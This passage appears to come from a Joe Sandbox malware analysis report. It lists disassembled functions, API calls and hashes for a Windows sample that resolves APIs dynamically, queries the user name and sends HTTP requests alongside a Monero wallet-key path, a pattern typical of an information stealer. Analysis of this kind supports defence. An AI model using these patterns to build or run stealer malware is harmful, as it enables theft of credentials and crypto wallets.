                        • Associated: 00000000.00000002.1799253602.0000000000739000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000073F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000074F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799565875.0000000000750000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799815431.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799842494.00000000008E2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_260000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: AllocateHeapProtectVirtual
                        • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                        • API String ID: 1542196881-2218711628
                        • Opcode ID: 1ad113b5d3ae6ca27866f82f268df141245929ffc5854594e0c247fe044f88a7
                        • Instruction ID: e4d338658deae3b4571e49b64587e27379e1cf6d64fb60d73fb8ffb9fb6d27fd
                        • Opcode Fuzzy Hash: 1ad113b5d3ae6ca27866f82f268df141245929ffc5854594e0c247fe044f88a7
                        • Instruction Fuzzy Hash: 7F413B347D37146BE626B7B4A8C1FAD765ADFC37C8F505044AA209A6C0CBB06560CFB2
                        Function 00264880 Relevance: 33.7, APIs: 11, Strings: 8, Instructions: 479networkstringfileCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 801 264880-264942 call 27a7a0 call 2647b0 call 27a740 * 5 InternetOpenA StrCmpCA 816 264944 801->816 817 26494b-26494f 801->817 816->817 818 264955-264acd call 278b60 call 27a920 call 27a8a0 call 27a800 * 2 call 27a9b0 call 27a8a0 call 27a800 call 27a9b0 call 27a8a0 call 27a800 call 27a920 call 27a8a0 call 27a800 call 27a9b0 call 27a8a0 call 27a800 call 27a9b0 call 27a8a0 call 27a800 call 27a9b0 call 27a920 call 27a8a0 call 27a800 * 2 InternetConnectA 817->818 819 264ecb-264ef3 InternetCloseHandle call 27aad0 call 269ac0 817->819 818->819 905 264ad3-264ad7 818->905 829 264ef5-264f2d call 27a820 call 27a9b0 call 27a8a0 call 27a800 819->829 830 264f32-264fa2 call 278990 * 2 call 27a7a0 call 27a800 * 8 819->830 829->830 906 264ae5 905->906 907 264ad9-264ae3 905->907 908 264aef-264b22 HttpOpenRequestA 906->908 907->908 909 264ebe-264ec5 InternetCloseHandle 908->909 910 264b28-264e28 call 27a9b0 call 27a8a0 call 27a800 call 27a920 call 27a8a0 call 27a800 call 27a9b0 call 27a8a0 call 27a800 call 27a9b0 call 27a8a0 call 27a800 call 27a9b0 call 27a8a0 call 27a800 call 27a9b0 call 27a8a0 call 27a800 call 27a920 call 27a8a0 call 27a800 call 27a9b0 call 27a8a0 call 27a800 call 27a9b0 call 27a8a0 call 27a800 call 27a920 call 27a8a0 call 27a800 call 27a9b0 call 27a8a0 call 27a800 call 27a9b0 call 27a8a0 call 27a800 call 27a9b0 call 27a8a0 call 27a800 call 27a9b0 call 27a8a0 call 27a800 call 27a920 call 27a8a0 call 27a800 call 27a740 call 27a920 * 2 call 27a8a0 call 27a800 * 2 call 27aad0 lstrlen call 27aad0 * 2 lstrlen call 27aad0 HttpSendRequestA 908->910 909->819 1021 264e32-264e5c InternetReadFile 910->1021 1022 264e67-264eb9 InternetCloseHandle call 27a800 1021->1022 1023 264e5e-264e65 1021->1023 1022->909 1023->1022 1024 264e69-264ea7 call 27a9b0 call 27a8a0 call 27a800 1023->1024 1024->1021
                        APIs
                          • Part of subcall function 0027A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0027A7E6
                          • Part of subcall function 002647B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00264839
                          • Part of subcall function 002647B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00264849
                          • Part of subcall function 0027A740: lstrcpy.KERNEL32(00280E17,00000000), ref: 0027A788
                        • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00264915
                        • StrCmpCA.SHLWAPI(?,00E2EA78), ref: 0026493A
                        • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00264ABA
                        • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,00280DDB,00000000,?,?,00000000,?,",00000000,?,00E2E948), ref: 00264DE8
                        • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00264E04
                        • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00264E18
                        • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00264E49
                        • InternetCloseHandle.WININET(00000000), ref: 00264EAD
                        • InternetCloseHandle.WININET(00000000), ref: 00264EC5
                        • HttpOpenRequestA.WININET(00000000,00E2E9C8,?,00E2DE60,00000000,00000000,00400100,00000000), ref: 00264B15
                          • Part of subcall function 0027A9B0: lstrlen.KERNEL32(?,00E28E80,?,\Monero\wallet.keys,00280E17), ref: 0027A9C5
                          • Part of subcall function 0027A9B0: lstrcpy.KERNEL32(00000000), ref: 0027AA04
                          • Part of subcall function 0027A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0027AA12
                          • Part of subcall function 0027A8A0: lstrcpy.KERNEL32(?,00280E17), ref: 0027A905
                          • Part of subcall function 0027A920: lstrcpy.KERNEL32(00000000,?), ref: 0027A972
                          • Part of subcall function 0027A920: lstrcat.KERNEL32(00000000), ref: 0027A982
                        • InternetCloseHandle.WININET(00000000), ref: 00264ECF
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1798593544.0000000000261000.00000040.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
                        • Associated: 00000000.00000002.1798512937.0000000000260000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.0000000000311000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.000000000031D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.0000000000342000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.00000000004AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000063F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.0000000000717000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.0000000000739000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000073F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000074F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799565875.0000000000750000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799815431.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799842494.00000000008E2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_260000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                        • String ID: "$"$------$------$------$H$h$x
                        • API String ID: 460715078-2324874663
                        • Opcode ID: 31a9b902f9882f182deeea2e426b75ae04ac6ff7b59394d0e326964bb521988b
                        • Instruction ID: 6e293426f0b3b865990d9c1d7409c3d92d54c11a648693ac3f1a2fa109019239
                        • Opcode Fuzzy Hash: 31a9b902f9882f182deeea2e426b75ae04ac6ff7b59394d0e326964bb521988b
                        • Instruction Fuzzy Hash: 3B122071921118AADB15FBA0DC92FEEB338BF55310F5081A9F11A62091DF702F69CF66
                        Function 00277850 Relevance: 4.5, APIs: 3, Instructions: 36memoryCOMMON
                        Download Yara Rule
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,002611B7), ref: 00277880
                        • RtlAllocateHeap.NTDLL(00000000), ref: 00277887
                        • GetUserNameA.ADVAPI32(00000104,00000104), ref: 0027789F
                        Memory Dump Source
                        • Source File: 00000000.00000002.1798593544.0000000000261000.00000040.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
                        • Associated: 00000000.00000002.1798512937.0000000000260000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.0000000000311000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.000000000031D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.0000000000342000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.00000000004AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000063F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.0000000000717000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.0000000000739000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000073F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000074F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799565875.0000000000750000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799815431.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799842494.00000000008E2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_260000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateNameProcessUser
                        • String ID:
                        • API String ID: 1296208442-0
                        • Opcode ID: a3001c3ad53fca1424b779f8ac1874f896108470b476c302ee88409e711ec5c7
                        • Instruction ID: 877097f12bb0ca3be1741556019d22b271e1f975a878f2916f731c0873dd6113
                        • Opcode Fuzzy Hash: a3001c3ad53fca1424b779f8ac1874f896108470b476c302ee88409e711ec5c7
                        • Instruction Fuzzy Hash: 4FF044B1944209ABC700DF94DD45FAEBFB8EB05711F100169F605A2680C7785514CBA1
                        Function 00261160 Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.1798593544.0000000000261000.00000040.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
                        • Associated: 00000000.00000002.1798512937.0000000000260000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.0000000000311000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.000000000031D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.0000000000342000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.00000000004AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000063F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.0000000000717000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.0000000000739000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000073F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000074F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799565875.0000000000750000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799815431.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799842494.00000000008E2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_260000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: ExitInfoProcessSystem
                        • String ID:
                        • API String ID: 752954902-0
                        • Opcode ID: 7d2ea676da31b99aad6a23ae8c94ce215a84e79cc759bb19e1892ff243238128
                        • Instruction ID: 881a73e801ba07bf95a844fde3577ee845bcb7826e7049c187eb70d97535f4f5
                        • Opcode Fuzzy Hash: 7d2ea676da31b99aad6a23ae8c94ce215a84e79cc759bb19e1892ff243238128
                        • Instruction Fuzzy Hash: 6CD05E7890030CDBCB00DFE0D8496EEBB7CFB09311F0005A4D90562340EB30A8A1CAAA
                        Function 00279C10 Relevance: 231.7, APIs: 112, Strings: 20, Instructions: 684libraryloaderCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 633 279c10-279c1a 634 27a036-27a0ca LoadLibraryA * 8 633->634 635 279c20-27a031 GetProcAddress * 43 633->635 636 27a146-27a14d 634->636 637 27a0cc-27a141 GetProcAddress * 5 634->637 635->634 638 27a216-27a21d 636->638 639 27a153-27a211 GetProcAddress * 8 636->639 637->636 640 27a21f-27a293 GetProcAddress * 5 638->640 641 27a298-27a29f 638->641 639->638 640->641 642 27a337-27a33e 641->642 643 27a2a5-27a332 GetProcAddress * 6 641->643 644 27a344-27a41a GetProcAddress * 9 642->644 645 27a41f-27a426 642->645 643->642 644->645 646 27a4a2-27a4a9 645->646 647 27a428-27a49d GetProcAddress * 5 645->647 648 27a4dc-27a4e3 646->648 649 27a4ab-27a4d7 GetProcAddress * 2 646->649 647->646 650 27a515-27a51c 648->650 651 27a4e5-27a510 GetProcAddress * 2 648->651 649->648 652 27a612-27a619 650->652 653 27a522-27a60d GetProcAddress * 10 650->653 651->650 654 27a67d-27a684 652->654 655 27a61b-27a678 GetProcAddress * 4 652->655 653->652 656 27a686-27a699 GetProcAddress 654->656 657 27a69e-27a6a5 654->657 655->654 656->657 658 27a6a7-27a703 GetProcAddress * 4 657->658 659 27a708-27a709 657->659 658->659
                        APIs
                        • GetProcAddress.KERNEL32(74DD0000,00E15530), ref: 00279C2D
                        • GetProcAddress.KERNEL32(74DD0000,00E15410), ref: 00279C45
                        • GetProcAddress.KERNEL32(74DD0000,00E29520), ref: 00279C5E
                        • GetProcAddress.KERNEL32(74DD0000,00E29280), ref: 00279C76
                        • GetProcAddress.KERNEL32(74DD0000,00E29250), ref: 00279C8E
                        • GetProcAddress.KERNEL32(74DD0000,00E29298), ref: 00279CA7
                        • GetProcAddress.KERNEL32(74DD0000,00E1BBA0), ref: 00279CBF
                        • GetProcAddress.KERNEL32(74DD0000,00E2CE38), ref: 00279CD7
                        • GetProcAddress.KERNEL32(74DD0000,00E2D060), ref: 00279CF0
                        • GetProcAddress.KERNEL32(74DD0000,00E2CEB0), ref: 00279D08
                        • GetProcAddress.KERNEL32(74DD0000,00E2D048), ref: 00279D20
                        • GetProcAddress.KERNEL32(74DD0000,00E15570), ref: 00279D39
                        • GetProcAddress.KERNEL32(74DD0000,00E15430), ref: 00279D51
                        • GetProcAddress.KERNEL32(74DD0000,00E155F0), ref: 00279D69
                        • GetProcAddress.KERNEL32(74DD0000,00E15210), ref: 00279D82
                        • GetProcAddress.KERNEL32(74DD0000,00E2CF70), ref: 00279D9A
                        • GetProcAddress.KERNEL32(74DD0000,00E2CF40), ref: 00279DB2
                        • GetProcAddress.KERNEL32(74DD0000,00E1BBC8), ref: 00279DCB
                        • GetProcAddress.KERNEL32(74DD0000,00E15310), ref: 00279DE3
                        • GetProcAddress.KERNEL32(74DD0000,00E2CDD8), ref: 00279DFB
                        • GetProcAddress.KERNEL32(74DD0000,00E2D078), ref: 00279E14
                        • GetProcAddress.KERNEL32(74DD0000,00E2CE98), ref: 00279E2C
                        • GetProcAddress.KERNEL32(74DD0000,00E2CEC8), ref: 00279E44
                        • GetProcAddress.KERNEL32(74DD0000,00E15350), ref: 00279E5D
                        • GetProcAddress.KERNEL32(74DD0000,00E2CEE0), ref: 00279E75
                        • GetProcAddress.KERNEL32(74DD0000,00E2CF88), ref: 00279E8D
                        • GetProcAddress.KERNEL32(74DD0000,00E2CDF0), ref: 00279EA6
                        • GetProcAddress.KERNEL32(74DD0000,00E2CE08), ref: 00279EBE
                        • GetProcAddress.KERNEL32(74DD0000,00E2D000), ref: 00279ED6
                        • GetProcAddress.KERNEL32(74DD0000,00E2CEF8), ref: 00279EEF
                        • GetProcAddress.KERNEL32(74DD0000,00E2CFE8), ref: 00279F07
                        • GetProcAddress.KERNEL32(74DD0000,00E2CF10), ref: 00279F1F
                        • GetProcAddress.KERNEL32(74DD0000,00E2D090), ref: 00279F38
                        • GetProcAddress.KERNEL32(74DD0000,00E2A5B0), ref: 00279F50
                        • GetProcAddress.KERNEL32(74DD0000,00E2CE20), ref: 00279F68
                        • GetProcAddress.KERNEL32(74DD0000,00E2CE50), ref: 00279F81
                        • GetProcAddress.KERNEL32(74DD0000,00E154B0), ref: 00279F99
                        • GetProcAddress.KERNEL32(74DD0000,00E2CE68), ref: 00279FB1
                        • GetProcAddress.KERNEL32(74DD0000,00E15270), ref: 00279FCA
                        • GetProcAddress.KERNEL32(74DD0000,00E2CFB8), ref: 00279FE2
                        • GetProcAddress.KERNEL32(74DD0000,00E2CF58), ref: 00279FFA
                        • GetProcAddress.KERNEL32(74DD0000,00E15330), ref: 0027A013
                        • GetProcAddress.KERNEL32(74DD0000,00E15890), ref: 0027A02B
                        • LoadLibraryA.KERNEL32(00E2CDC0,?,00275CA3,00280AEB,?,?,?,?,?,?,?,?,?,?,00280AEA,00280AE3), ref: 0027A03D
                        • LoadLibraryA.KERNEL32(00E2CE80,?,00275CA3,00280AEB,?,?,?,?,?,?,?,?,?,?,00280AEA,00280AE3), ref: 0027A04E
                        • LoadLibraryA.KERNEL32(00E2CF28,?,00275CA3,00280AEB,?,?,?,?,?,?,?,?,?,?,00280AEA,00280AE3), ref: 0027A060
                        • LoadLibraryA.KERNEL32(00E2D018,?,00275CA3,00280AEB,?,?,?,?,?,?,?,?,?,?,00280AEA,00280AE3), ref: 0027A072
                        • LoadLibraryA.KERNEL32(00E2D030,?,00275CA3,00280AEB,?,?,?,?,?,?,?,?,?,?,00280AEA,00280AE3), ref: 0027A083
                        • LoadLibraryA.KERNEL32(00E2CDA8,?,00275CA3,00280AEB,?,?,?,?,?,?,?,?,?,?,00280AEA,00280AE3), ref: 0027A095
                        • LoadLibraryA.KERNEL32(00E2CFA0,?,00275CA3,00280AEB,?,?,?,?,?,?,?,?,?,?,00280AEA,00280AE3), ref: 0027A0A7
                        • LoadLibraryA.KERNEL32(00E2CFD0,?,00275CA3,00280AEB,?,?,?,?,?,?,?,?,?,?,00280AEA,00280AE3), ref: 0027A0B8
                        • GetProcAddress.KERNEL32(75290000,00E15910), ref: 0027A0DA
                        • GetProcAddress.KERNEL32(75290000,00E2D2A0), ref: 0027A0F2
                        • GetProcAddress.KERNEL32(75290000,00E291E0), ref: 0027A10A
                        • GetProcAddress.KERNEL32(75290000,00E2D378), ref: 0027A123
                        • GetProcAddress.KERNEL32(75290000,00E157F0), ref: 0027A13B
                        • GetProcAddress.KERNEL32(6FC70000,00E1B8D0), ref: 0027A160
                        • GetProcAddress.KERNEL32(6FC70000,00E158D0), ref: 0027A179
                        • GetProcAddress.KERNEL32(6FC70000,00E1B998), ref: 0027A191
                        • GetProcAddress.KERNEL32(6FC70000,00E2D318), ref: 0027A1A9
                        • GetProcAddress.KERNEL32(6FC70000,00E2D2D0), ref: 0027A1C2
                        • GetProcAddress.KERNEL32(6FC70000,00E15870), ref: 0027A1DA
                        • GetProcAddress.KERNEL32(6FC70000,00E158B0), ref: 0027A1F2
                        • GetProcAddress.KERNEL32(6FC70000,00E2D1F8), ref: 0027A20B
                        • GetProcAddress.KERNEL32(752C0000,00E15670), ref: 0027A22C
                        • GetProcAddress.KERNEL32(752C0000,00E158F0), ref: 0027A244
                        • GetProcAddress.KERNEL32(752C0000,00E2D2E8), ref: 0027A25D
                        • GetProcAddress.KERNEL32(752C0000,00E2D0D8), ref: 0027A275
                        • GetProcAddress.KERNEL32(752C0000,00E15930), ref: 0027A28D
                        • GetProcAddress.KERNEL32(74EC0000,00E1B948), ref: 0027A2B3
                        • GetProcAddress.KERNEL32(74EC0000,00E1B678), ref: 0027A2CB
                        • GetProcAddress.KERNEL32(74EC0000,00E2D1E0), ref: 0027A2E3
                        • GetProcAddress.KERNEL32(74EC0000,00E15750), ref: 0027A2FC
                        • GetProcAddress.KERNEL32(74EC0000,00E156F0), ref: 0027A314
                        • GetProcAddress.KERNEL32(74EC0000,00E1B790), ref: 0027A32C
                        • GetProcAddress.KERNEL32(75BD0000,00E2D390), ref: 0027A352
                        • GetProcAddress.KERNEL32(75BD0000,00E15770), ref: 0027A36A
                        • GetProcAddress.KERNEL32(75BD0000,00E291F0), ref: 0027A382
                        • GetProcAddress.KERNEL32(75BD0000,00E2D120), ref: 0027A39B
                        • GetProcAddress.KERNEL32(75BD0000,00E2D300), ref: 0027A3B3
                        • GetProcAddress.KERNEL32(75BD0000,00E15730), ref: 0027A3CB
                        • GetProcAddress.KERNEL32(75BD0000,00E15950), ref: 0027A3E4
                        • GetProcAddress.KERNEL32(75BD0000,00E2D330), ref: 0027A3FC
                        • GetProcAddress.KERNEL32(75BD0000,00E2D348), ref: 0027A414
                        • GetProcAddress.KERNEL32(75A70000,00E15970), ref: 0027A436
                        • GetProcAddress.KERNEL32(75A70000,00E2D360), ref: 0027A44E
                        • GetProcAddress.KERNEL32(75A70000,00E2D210), ref: 0027A466
                        • GetProcAddress.KERNEL32(75A70000,00E2D180), ref: 0027A47F
                        • GetProcAddress.KERNEL32(75A70000,00E2D1B0), ref: 0027A497
                        • GetProcAddress.KERNEL32(75450000,00E15990), ref: 0027A4B8
                        • GetProcAddress.KERNEL32(75450000,00E15690), ref: 0027A4D1
                        • GetProcAddress.KERNEL32(75DA0000,00E15610), ref: 0027A4F2
                        • GetProcAddress.KERNEL32(75DA0000,00E2D0A8), ref: 0027A50A
                        • GetProcAddress.KERNEL32(6F070000,00E15790), ref: 0027A530
                        • GetProcAddress.KERNEL32(6F070000,00E159B0), ref: 0027A548
                        • GetProcAddress.KERNEL32(6F070000,00E15630), ref: 0027A560
                        • GetProcAddress.KERNEL32(6F070000,00E2D198), ref: 0027A579
                        • GetProcAddress.KERNEL32(6F070000,00E15810), ref: 0027A591
                        • GetProcAddress.KERNEL32(6F070000,00E156B0), ref: 0027A5A9
                        • GetProcAddress.KERNEL32(6F070000,00E15830), ref: 0027A5C2
                        • GetProcAddress.KERNEL32(6F070000,00E15650), ref: 0027A5DA
                        • GetProcAddress.KERNEL32(6F070000,InternetSetOptionA), ref: 0027A5F1
                        • GetProcAddress.KERNEL32(6F070000,HttpQueryInfoA), ref: 0027A607
                        • GetProcAddress.KERNEL32(75AF0000,00E2D168), ref: 0027A629
                        • GetProcAddress.KERNEL32(75AF0000,00E29160), ref: 0027A641
                        • GetProcAddress.KERNEL32(75AF0000,00E2D0C0), ref: 0027A659
                        • GetProcAddress.KERNEL32(75AF0000,00E2D240), ref: 0027A672
                        • GetProcAddress.KERNEL32(75D90000,00E15850), ref: 0027A693
                        • GetProcAddress.KERNEL32(6CFD0000,00E2D1C8), ref: 0027A6B4
                        • GetProcAddress.KERNEL32(6CFD0000,00E156D0), ref: 0027A6CD
                        • GetProcAddress.KERNEL32(6CFD0000,00E2D2B8), ref: 0027A6E5
                        • GetProcAddress.KERNEL32(6CFD0000,00E2D0F0), ref: 0027A6FD
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1798593544.0000000000261000.00000040.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
                        • Associated: 00000000.00000002.1798512937.0000000000260000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.0000000000311000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.000000000031D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.0000000000342000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.00000000004AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000063F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.0000000000717000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.0000000000739000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000073F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000074F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799565875.0000000000750000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799815431.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799842494.00000000008E2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_260000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: AddressProc$LibraryLoad
                        • String ID: 0S$0T$0U$0V$0W$0X$0Y$HttpQueryInfoA$InternetSetOptionA$PS$PV$PW$PX$PY$pR$pU$pV$pW$pX$pY
                        • API String ID: 2238633743-3081426368
